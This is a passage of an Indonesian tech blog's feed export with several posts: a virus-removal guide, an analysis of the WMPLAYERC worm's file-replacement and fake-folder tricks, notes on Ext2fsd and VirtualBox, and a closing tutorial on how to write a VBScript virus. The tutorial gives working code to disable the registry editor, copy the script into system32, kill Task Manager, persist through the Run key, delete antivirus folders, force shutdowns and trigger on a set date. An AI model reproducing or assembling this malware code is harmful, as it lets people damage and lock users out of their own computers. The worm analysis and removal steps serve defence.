/&gt;&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden, CheckedValue,0x00010001,0&lt;br /&gt;&lt;br /&gt;SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden, DefaultValue,0x00010001,0&lt;br /&gt;&lt;br /&gt;SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden, UncheckedValue,0x00010001,1&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;[del]&lt;br /&gt;&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools&lt;br /&gt;&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableCMD&lt;br /&gt;&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFolderOptions&lt;br /&gt;&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run,ctfmon.exe&lt;br /&gt;&lt;br /&gt;HKLM, SYSTEM\ControlSet001\Services\kernelx86&lt;br /&gt;&lt;br /&gt;HKLM, SYSTEM\ControlSet002\Services\kernelx86&lt;br /&gt;&lt;br /&gt;HKLM, SYSTEM\CurrentControlSet\Services\kernelx86&lt;br /&gt;&lt;br /&gt;HKLM, SYSTEM\CurrentControlSet\Services\mojbtjlt&lt;br /&gt;&lt;br /&gt;HKLM, SYSTEM\ControlSet001\Services\mojbtjlt&lt;br /&gt;&lt;br /&gt;HKLM, SYSTEM\ControlSet002\Services\mojbtjlt&lt;br /&gt;&lt;br /&gt;HKLM, SYSTEM\ControlSet001\Services\Passthru&lt;br /&gt;&lt;br /&gt;HKLM, SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore&lt;br /&gt;&lt;br /&gt;HKLM, SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate, DoNotAllowXPSP2&lt;br /&gt;&lt;br /&gt;HKLM, SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate&lt;br /&gt;&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;6.    Fix registry Windows untuk mengembalikan agar komputer dapat booting “safe mode with command prompt” dengan download file FixSafeBoot.reg (Windows XP) di alamat berikut kemudian jalankan file tersebut dengan cara :&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;o   Klik menu [Start]&lt;br /&gt;&lt;br /&gt;o   Klik [Run]&lt;br /&gt;&lt;br /&gt;o   Ketik REGEDIT.EXE kemudian klik tombol [OK]&lt;br /&gt;&lt;br /&gt;o   Pada layar “Registry Editor”, klik menu [File | Import]&lt;br /&gt;&lt;br /&gt;o   Tentukan file .REG yang baru anda buat&lt;br /&gt;&lt;br /&gt;o   Klik tombol [Open]&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;7.       Hapus file temporary dan temporary internet file. Silahkan gunakan tools ATF-Cleaner. Download tools tersebut di alamat http://www.atribune.org/public-beta/ATF-Cleaner.exe&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;8.       Restore kembali host file Windows yang telah di ubah oleh virus. Anda dapat menggunakan tools Hoster, silahkan download di alamat berikut http://www.softpedia.com/progDownload/Hoster-Download-27041.html&lt;br /&gt;&lt;br /&gt;9.        Untuk pembersihan optimal dan mencegah infeksi ulang, scan dengan antivirus yang up-to-date dan sudah dapat mendeteksi virus ini. Anda juga dapat menggunakan Norman Malware Cleaner, silahkan download di alamat berikut   http://www.norman.com/support/support_tools/58732/en.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8177802711873346685-2838305135507488948?l=rinaldojonathan.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rinaldojonathan.blogspot.com/feeds/2838305135507488948/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://rinaldojonathan.blogspot.com/2010/01/kalau-mcgyver-membuat-virus.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/2838305135507488948'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/2838305135507488948'/><link rel='alternate' type='text/html' href='http://rinaldojonathan.blogspot.com/2010/01/kalau-mcgyver-membuat-virus.html' title='Kalau McGyver membuat virus'/><author><name>Rinaldo Jonathan</name><uri>http://www.blogger.com/profile/05218924290554068114</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8177802711873346685.post-8035282769808406761</id><published>2010-01-25T17:30:00.000-08:00</published><updated>2010-01-25T17:44:28.006-08:00</updated><title type='text'>Virus WMPLAYERC</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Rf6HHbGr9iQ/S15Hn86vwZI/AAAAAAAAABE/6swLj2uWcYQ/s1600-h/wmplayerc01.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 273px;" src="http://3.bp.blogspot.com/_Rf6HHbGr9iQ/S15Hn86vwZI/AAAAAAAAABE/6swLj2uWcYQ/s320/wmplayerc01.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5430856952348393874" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Ya....sebelumnya natal dan tahun baru 2009 ya.....sori kelamaan....&lt;br /&gt;Wmplayerc merupakan worm lokal yang sudah dikenal sejak PCMAV 2.2a Update Build3 dan dilaporkan menyebar luas di Indonesia. Kali ini akan ditampilkan analisa lebih lengkapnya. Efek merugikan dari virus ini adalah menghapus file-file multimedia yang dikenali dari daftar ekstensi file yang disimpan pada tubuh virus. File-file multimedia yang ditemukan akan digantikan dengan file virus yang siap dijalankan dan menyebar.&lt;br /&gt;&lt;br /&gt;Daftar Ekstensi File&lt;br /&gt;Berikut adalah daftar ekstensi file multimedia yang dapat menjadi korban virus ini adalah:&lt;br /&gt;.AVI&lt;br /&gt;.3GP&lt;br /&gt;.MP4&lt;br /&gt;.FLV&lt;br /&gt;.ASF&lt;br /&gt;.M4V&lt;br /&gt;.MPE&lt;br /&gt;.VMV&lt;br /&gt;.M1V&lt;br /&gt;.M2V&lt;br /&gt;.VOB&lt;br /&gt;.MOV&lt;br /&gt;.WVX&lt;br /&gt;.MKV&lt;br /&gt;.MPA&lt;br /&gt;.MPV&lt;br /&gt;.DIV&lt;br /&gt;.M2P&lt;br /&gt;.3G2&lt;br /&gt;.DAT&lt;br /&gt;.MPEG&lt;br /&gt;.DIVX&lt;br /&gt;.REAL&lt;br /&gt;&lt;br /&gt;Manipulasi Folder&lt;br /&gt;Dalam upayanya menyembunyikan diri dan kembali aktif (seandainya Anda berhasil mematikan prosesnya di memory), virus ini membuat duplikat folder-folder yang ada pada root drive dalam bentuk shortcut/link, dan menyembunyikan folder asli dengan atribut sistem/superhidden.&lt;br /&gt;&lt;br /&gt;Alhasil, sekilas komputer Anda tampak baik-baik saja, hanya saja kalau diperhatikan melalui Windows Explorer, Anda akan melihat folder yang ada pada root drive (misalnya Windows, Program Files) memiliki size 2 KB. Sementara, folder yang sesungguhnya tidak&lt;br /&gt;mencantumkan ukuran pada Windows Explorer. Untuk melihat kondisi sebenarnya, atur konfigurasi Windows Explorer dengan memilih menu Tools – Folder Options, pililh “Show hidden files and folders”, dan hapus tanda centang pada pilihan “Hide extensions for known file types” dan “Hide protected operating system files (Recommended)”.&lt;br /&gt;&lt;br /&gt;Apa yang terjadi saat Anda meng-klik folder bohongan tersebut? Yang dijalankan adalah perintah berikut:&lt;br /&gt;&lt;br /&gt;%WINDIR%\system32\rundll32.exe Shell32.dll,ShellExec_RunDLL “RÊCYCLÊR\  .com”  “NamaFolder”&lt;br /&gt;&lt;br /&gt;“NamaFolder” adalah folder sebenarnya. Folder tersebut tetap terbuka, tetapi sebelumnya virus telah dieksekusi, terlihat bahwa induk virus disimpan dengan nama “ .com” (tanpa tanda kutip) pada folder RÊCYCLÊR.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Rf6HHbGr9iQ/S15H5w5ZTBI/AAAAAAAAABM/P9WEql--rMg/s1600-h/wmplayerc02.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 230px; height: 320px;" src="http://1.bp.blogspot.com/_Rf6HHbGr9iQ/S15H5w5ZTBI/AAAAAAAAABM/P9WEql--rMg/s320/wmplayerc02.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5430857258359147538" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Pembedahan Virus&lt;br /&gt;Virus ini memiliki beberapa “daftar cekal” berupa URL website-website porno lokal, jadi saat komputer yang terinfeksi melakukan browsing ke beberapa website porno tersebut, komputer akan shutdown dengan sendirinya.&lt;br /&gt;&lt;br /&gt;Virus juga melakukan pengecekan terhadap program yang berjalan, dengan mendeteksi caption yang terdapat pada program tersebut. Kembali beberapa kata berkonotasi porno dicekal oleh virus. Selain itu, string Norman Malware Cleaner, PROCEXPL, PeiD v0.95, PeiD v0.94, dan OLLYDBG juga termasuk daftar string yang akan membuat sang virus melakukan shutdown pada komputer.&lt;br /&gt;&lt;br /&gt;Komputer dapat terinfeksi virus ini melalui flash disk yang telah terinfeksi, yaitu saat pengguna meng-klik folder bohongan pada flash disk atau media storage yang sebenarnya berupa link pemanggil virus. Selain itu, ketidakwaspadaan juga dapat membuat Anda mengklik file virus yang menyamar sebagai file multimedia, lengkap dengan icon media player untuk menjebak pengguna.&lt;br /&gt;&lt;br /&gt;Selain menciptakan file induk yang berukuran sekitar 66 KB pada folder  RÊCYCLÊR, file induk juga diciptakan pada folder Program Files\Windows Media Player dengan nama Wmplayerc.exe atau Xvidshow.exe (jika komputer Anda terinstal codec XviD). Pengambilan  string dengan membedah dan memetakan kembali tubuh virus divisualisasikan pada gambar berikut.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Rf6HHbGr9iQ/S15ImLzg2KI/AAAAAAAAABU/6hMgDFb4qVE/s1600-h/wmplayerc03.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 320px; height: 179px;" src="http://1.bp.blogspot.com/_Rf6HHbGr9iQ/S15ImLzg2KI/AAAAAAAAABU/6hMgDFb4qVE/s320/wmplayerc03.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5430858021496477858" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Pada tubuh virus juga terdapat perintah shutdown.exe -r -f -t 00, yang besar kemungkinannya merupakan perintah yang akan dieksekusi saat virus mendeteksi pengaksesan website porno atau caption tertentu. Parameter -r memberikan instruksi shutdown dan restart, parameter -f memaksa aplikasi lain tertutup, dan parameter -t 00 merupakan timeout untuk melakukan proses shutdown, dalam hal ini diset 0 detik.&lt;br /&gt;&lt;br /&gt;Saat aktif, virus ini memuat file dropper ke memory dengan nama svchost.exe, yang berfungsi untuk memonitor traffic TCP/IP sehingga dapat mendeteksi saat Anda menjalankan URL yang termasuk dalam daftar web porno yang disimpan oleh dropper. File dropper ini dibuat dengan VisualBasic dan berukuran sekitar 9 KB. Selain itu, string bertuliskan “Tak gendong kemana-mana.. Enak Tau !!! Ha Ha Ha Ha” juga tampak pada tubuh file ini.&lt;br /&gt;&lt;br /&gt;Gunakan PCMAV terbaru untuk pembersihan secara tuntas virus Wmplayerc. Perhatikan jika terdapat file yang Anda yakini adalah  nama file multimedia milik Anda -  tetapi terdeteksi sebagai virus Wmplayerc -  maka file tersebut sudah bukan file video yang asli lagi, tetapi file virus yang menyamar (silakan cek ukuran dan ekstensi file tersebut jika Anda masih ragu-ragu), sedangkan file video yang asli telah raib dihapus oleh virus tersebut. Lakukan recovery sebisanya jika Anda terlanjur mengalami hal ini, tapi tetap jangan buka bokep!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8177802711873346685-8035282769808406761?l=rinaldojonathan.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rinaldojonathan.blogspot.com/feeds/8035282769808406761/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://rinaldojonathan.blogspot.com/2010/01/virus-wmplayerc.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/8035282769808406761'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/8035282769808406761'/><link rel='alternate' type='text/html' href='http://rinaldojonathan.blogspot.com/2010/01/virus-wmplayerc.html' title='Virus WMPLAYERC'/><author><name>Rinaldo Jonathan</name><uri>http://www.blogger.com/profile/05218924290554068114</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_Rf6HHbGr9iQ/S15Hn86vwZI/AAAAAAAAABE/6swLj2uWcYQ/s72-c/wmplayerc01.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8177802711873346685.post-6228058569602061230</id><published>2009-12-20T02:39:00.000-08:00</published><updated>2009-12-20T02:41:54.679-08:00</updated><title type='text'>Mengakses partisi Linux dari Windows</title><content type='html'>Jika komputer kita menggunakan sistem operasi Windows dan Linux (dual OS), kemungkinan besar, menggunakan Ext2fsd akan sangat berguna. Ext2fsd (ext2fsd.sourceforge.net) adalah driver sistem file untuk Windows (2000, XP dan 2003) open source yang dapat digunakan untuk mounting partisi linux (ext2 dan ext3), sehingga memungkinkan kita mengakses (read dan write) partisi linux saat kita menggunakan Windows. Hasil mounting akan menjadi drive baru dalam Windows.&lt;br /&gt;&lt;br /&gt;Saya sudah mencoba dengan menginstall dari installer file exe-nya. Pada jendela manager, saya jalankan service, mengeset partisi ext3 sebagai drive L. Hanya saja ketika Windows saya restart, meskipun service tetap berjalan –begitu juga dengan Ext2fsd manager-nya yang muncul pada system tray, tetapi partisi ext3 Ubuntu di PC saya tidak otomatis dimounting pada drive L yang saya set sebelumnya. Jadi, saya harus me-mounting ulang partisi ketika akan menggunakan (yang ini agak menyebalkaaan)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8177802711873346685-6228058569602061230?l=rinaldojonathan.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rinaldojonathan.blogspot.com/feeds/6228058569602061230/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://rinaldojonathan.blogspot.com/2009/12/mengakses-partisi-linux-dari-windows.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/6228058569602061230'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/6228058569602061230'/><link rel='alternate' type='text/html' href='http://rinaldojonathan.blogspot.com/2009/12/mengakses-partisi-linux-dari-windows.html' title='Mengakses partisi Linux dari Windows'/><author><name>Rinaldo Jonathan</name><uri>http://www.blogger.com/profile/05218924290554068114</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8177802711873346685.post-6441316630980038489</id><published>2009-12-20T02:28:00.000-08:00</published><updated>2009-12-20T02:38:27.037-08:00</updated><title type='text'>Mencoba VirtualBox</title><content type='html'>VirtualBox merupakan software untuk melakukan virtualisasi hardware, sehingga memungkinkan pada komputer yang terinstall Windows XP misalnya (host), dengan VirtualBox kita dapat menginstall linux atau sistem operasi lainnya (guest), dan antara host dan guess dapat berjalan bersamaan. Cara ini mungkin cocok bagi yang berniat mencoba linux tanpa harus menginstall secara sendiri atau dual boot, tentu dengan berbagai keterbatasannya. Ketersediaan memory untuk menjalankan dua sistem operasi secara bersamaan merupakan faktor yang menurut saya perlu diperhatikan agar keduanya dapat berjalan dengan baik.&lt;br /&gt;&lt;br /&gt;VirtualBox yang dapat digunakan secara gratis dan berlisensi GNU/GPL ini dapat berjalan pada Windows, Linux atau Macintosh sebagai host dan mendukung sejumlah sistem operasi yang dapat dijadikan guess-nya termasuk Windows (NT 4.0, 2000, XP, Server 2003, Vista), DOS/Windows 3.x, Linux (2.4 dan 2.6), dan OpenBSD. VirtualBox saat ini hanya dapat mengemulasi mesin Intel x86.&lt;br /&gt;&lt;br /&gt;Ketika berjalan, untuk masuk ke sistem operasi guess dilakukan dengan mengklik mouse pada layar guess, dan untuk kembali ke host, defaultnya dilakukan dengan menekan tombol Ctrl sebelah kanan. Untuk berbagi folder host untuk guess, dengan mudah dapat difasilitasi dengan fasilitas share folder. Jika ingin mencoba mouse tembus :-)(kagak make ctrl kanan)install aja VirtualBox Guest Additions.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Rf6HHbGr9iQ/Sy3-hsj7XbI/AAAAAAAAAA8/NCV9qbIeGa0/s1600-h/vbox_logo2_gradient.JPG"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 140px; height: 180px;" src="http://1.bp.blogspot.com/_Rf6HHbGr9iQ/Sy3-hsj7XbI/AAAAAAAAAA8/NCV9qbIeGa0/s320/vbox_logo2_gradient.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5417265781647564210" /&gt;&lt;/a&gt;Download VirtualBox&lt;br /&gt;www.virtualbox.org&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Rf6HHbGr9iQ/Sy3-WaxIveI/AAAAAAAAAA0/De8UBhrMD9E/s1600-h/mint8-dl-46.JPG"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 72px; height: 64px;" src="http://1.bp.blogspot.com/_Rf6HHbGr9iQ/Sy3-WaxIveI/AAAAAAAAAA0/De8UBhrMD9E/s320/mint8-dl-46.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5417265587892567522" /&gt;&lt;/a&gt;&lt;br /&gt;Download Linux Mint 8 utk OS guest cobaan&lt;br /&gt;www.linuxmint.com&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8177802711873346685-6441316630980038489?l=rinaldojonathan.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rinaldojonathan.blogspot.com/feeds/6441316630980038489/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://rinaldojonathan.blogspot.com/2009/12/mencoba-virtualbox.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/6441316630980038489'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/6441316630980038489'/><link rel='alternate' type='text/html' href='http://rinaldojonathan.blogspot.com/2009/12/mencoba-virtualbox.html' title='Mencoba VirtualBox'/><author><name>Rinaldo Jonathan</name><uri>http://www.blogger.com/profile/05218924290554068114</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_Rf6HHbGr9iQ/Sy3-hsj7XbI/AAAAAAAAAA8/NCV9qbIeGa0/s72-c/vbox_logo2_gradient.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8177802711873346685.post-1500784453710900145</id><published>2009-11-05T23:30:00.001-08:00</published><updated>2009-11-05T23:32:38.977-08:00</updated><title type='text'>Anti Virus</title><content type='html'>Untuk virus-virus dibawah, pilih antinya antara SmadAV, PCMAV atau Ansav.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8177802711873346685-1500784453710900145?l=rinaldojonathan.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rinaldojonathan.blogspot.com/feeds/1500784453710900145/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://rinaldojonathan.blogspot.com/2009/11/anti-virus.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/1500784453710900145'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/1500784453710900145'/><link rel='alternate' type='text/html' href='http://rinaldojonathan.blogspot.com/2009/11/anti-virus.html' title='Anti Virus'/><author><name>Rinaldo Jonathan</name><uri>http://www.blogger.com/profile/05218924290554068114</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8177802711873346685.post-5509540020441211442</id><published>2009-10-30T16:33:00.000-07:00</published><updated>2009-10-30T16:37:50.079-07:00</updated><title type='text'>Cara Mudah Membuat Virus Format *.VBS</title><content type='html'>Pertama2, berikut ini hal-hal &lt;br /&gt;yang wajib kita siapin sebelum &lt;br /&gt;membuat virus. &lt;br /&gt;&lt;br /&gt;# seperangkat komputer &lt;br /&gt;berikut &lt;br /&gt;monitor,cpu,mouse,kibor, dll &lt;br /&gt;(wajib) &lt;br /&gt;&lt;br /&gt;# kita harus menyiapkan &lt;br /&gt;sebuah file yang ber-ekstensi &lt;br /&gt;vbs (*.vbs) &lt;br /&gt;&lt;br /&gt;# secangkir teh anget. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Untuk eksekusi pertama, yang &lt;br /&gt;dilakukan virus biasanya &lt;br /&gt;mengubah registry. &lt;br /&gt;&lt;br /&gt;misalnya: &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. mendisable regedit. Yang &lt;br /&gt;kita tulis: &lt;br /&gt;&lt;br /&gt;On Error Resume &lt;br /&gt;Next(perintah ini digunakan &lt;br /&gt;pada file vb &lt;br /&gt;&lt;br /&gt;supaya kalo ada yang salah &lt;br /&gt;bisa dilanjutin kode &lt;br /&gt;selanjutnya) &lt;br /&gt;&lt;br /&gt;CreateObject("WScript.Shell &lt;br /&gt;").run "cmd.exe /c reg add &lt;br /&gt;hkcusoftware\microsoft\wi &lt;br /&gt;ndows\currentversion\polici &lt;br /&gt;es\system /v &lt;br /&gt;&lt;br /&gt;disableregistrytools /t &lt;br /&gt;reg_dword /d ""1"" /f", vbhide &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;sebenarnya banyak cara untuk &lt;br /&gt;mendisable regedit. misalnya &lt;br /&gt;kek gini: &lt;br /&gt;&lt;br /&gt;CreateObject("WScript.Shel &lt;br /&gt;l").regwriteHKEY_CURRENT &lt;br /&gt;_USERsoftware\microsoft\wi &lt;br /&gt;ndows\currentversion\policie &lt;br /&gt;s\systemdisableregistrytools", &lt;br /&gt;1, "REG_DWORD"  &lt;br /&gt; &lt;br /&gt;2. mengopikan diri ke &lt;br /&gt;direktory lain &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;CreateObject("Scripting.File &lt;br /&gt;SystemObject"). &lt;br /&gt;&lt;br /&gt;GetFile(WScript.ScriptFullName).Copy &lt;br /&gt;"c:\windows\system32\virus. &lt;br /&gt;vbs" &lt;br /&gt;&lt;br /&gt;Ada juga cara lain dengan seperti ini: &lt;br /&gt;&lt;br /&gt;On Error Resume Next &lt;br /&gt;&lt;br /&gt;createobject("scripting.files &lt;br /&gt;ystemobject").copyfile &lt;br /&gt;wscript.scriptfullname, &lt;br /&gt;&lt;br /&gt;createobject("scripting.files &lt;br /&gt;ystemobject") &lt;br /&gt;&lt;br /&gt;.getspecialfolder(1) &amp; &lt;br /&gt;"\virus.vbs" &lt;br /&gt;&lt;br /&gt;misalnya untuk mengkopikan &lt;br /&gt;diri ke direktory &lt;br /&gt;C:\WINDOWS\System32 &lt;br /&gt;&lt;br /&gt;dengan nama virus.vbs &lt;br /&gt;&lt;br /&gt;.getspecialfolder(0) digunakan &lt;br /&gt;untuk direktory WINDOWS &lt;br /&gt;&lt;br /&gt;.getspecialfolder(1 ) digunakan &lt;br /&gt;untuk direktory SYSTEM32 &lt;br /&gt;pada windowsXP &lt;br /&gt;&lt;br /&gt;.getspecialfolder(2) digunakan &lt;br /&gt;untuk direktory Temporary &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3.Membunuh proses . &lt;br /&gt;&lt;br /&gt;digunakan untuk membunuh &lt;br /&gt;proses &lt;br /&gt;&lt;br /&gt;(proses adalah program yang &lt;br /&gt;sedang berjalan) &lt;br /&gt;&lt;br /&gt;misalnya kita akan membunuh &lt;br /&gt;proses taskmanager &lt;br /&gt;&lt;br /&gt;On Error Resume Next &lt;br /&gt;&lt;br /&gt;CreateObject("WScript.Shell") &lt;br /&gt;&lt;br /&gt;.run "taskkill /f /im &lt;br /&gt;taskmgr.exe", vbhide &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4.Menjalankan virus pada saat &lt;br /&gt;startup atau saat windows &lt;br /&gt;dihidupkan. &lt;br /&gt;&lt;br /&gt;menggunakan regedit &lt;br /&gt;&lt;br /&gt;On Error Resume Next &lt;br /&gt;&lt;br /&gt;CreateObject("WScript.Shell &lt;br /&gt;").RegWrite &lt;br /&gt;"HKEY_LOCAL_MACHINESof &lt;br /&gt;tware\Microsoft\Windows\Cu &lt;br /&gt;rrentVersion\Run\virus" &lt;br /&gt;&lt;br /&gt;, &lt;br /&gt;"c:\windows\system32\virus. &lt;br /&gt;vbs" &lt;br /&gt;&lt;br /&gt;(menjalankan virus yang &lt;br /&gt;berada di direktory &lt;br /&gt;c:\windows\system32 &lt;br /&gt;&lt;br /&gt;dengan nama virus.vbs) &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;5.Menghapus File / Folder &lt;br /&gt;&lt;br /&gt;agar virus yang kita buat tidak &lt;br /&gt;banyak menggunakan script &lt;br /&gt;bisa di singkat seperti ini: &lt;br /&gt;&lt;br /&gt;On Error Resume Next &lt;br /&gt;&lt;br /&gt;set hapus = &lt;br /&gt;CreateObject("Scripting.Fil &lt;br /&gt;eSystemObject") &lt;br /&gt;&lt;br /&gt;hapus.DeleteFile &lt;br /&gt;"C:\xxx.exe"'(menghapus file &lt;br /&gt;xxx.exe di direktory C:\) &lt;br /&gt;&lt;br /&gt;hapus.DeleteFolder &lt;br /&gt;"C:\antivirus"'(menghapus &lt;br /&gt;folder antivirus di direktory &lt;br /&gt;C:\) &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;6.Merestart Windows &lt;br /&gt;&lt;br /&gt;CreateObject("WScript.Shell &lt;br /&gt;").run "shutdown -r -f -t 60", &lt;br /&gt;vbhide &lt;br /&gt;&lt;br /&gt;merestart windows dalam &lt;br /&gt;waktu 60 sekon &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;7.Meng-ShutDown Windows &lt;br /&gt;&lt;br /&gt;CreateObject("WScript.Shell &lt;br /&gt;").run "shutdown -s-f -t 60", &lt;br /&gt;vbhide &lt;br /&gt;&lt;br /&gt;mematikan windows dalam &lt;br /&gt;waktu 60 sekon yang beda &lt;br /&gt;cuman &lt;br /&gt;&lt;br /&gt;"shutdown -s-f -t 60" &lt;br /&gt;&lt;br /&gt;S = untuk shutdown dan &lt;br /&gt;&lt;br /&gt;R = untuk reboot\restart &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;8. Mengaktifkan Virus Pada &lt;br /&gt;Waktu tertentu &lt;br /&gt;&lt;br /&gt;If day(now) = 1 and &lt;br /&gt;month(now) = 1 and year(now) &lt;br /&gt;= 2007 then &lt;br /&gt;&lt;br /&gt;'(masukkan kode virus disini) &lt;br /&gt;&lt;br /&gt;End if &lt;br /&gt;&lt;br /&gt;'misalnya kalo mau &lt;br /&gt;mengaktifkan pada tanggal 1 , &lt;br /&gt;bulan 1 &lt;br /&gt;&lt;br /&gt;'dan tahun 2007&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8177802711873346685-5509540020441211442?l=rinaldojonathan.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rinaldojonathan.blogspot.com/feeds/5509540020441211442/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://rinaldojonathan.blogspot.com/2009/10/cara-mudah-membuat-virus-format-vbs.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/5509540020441211442'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/5509540020441211442'/><link rel='alternate' type='text/html' 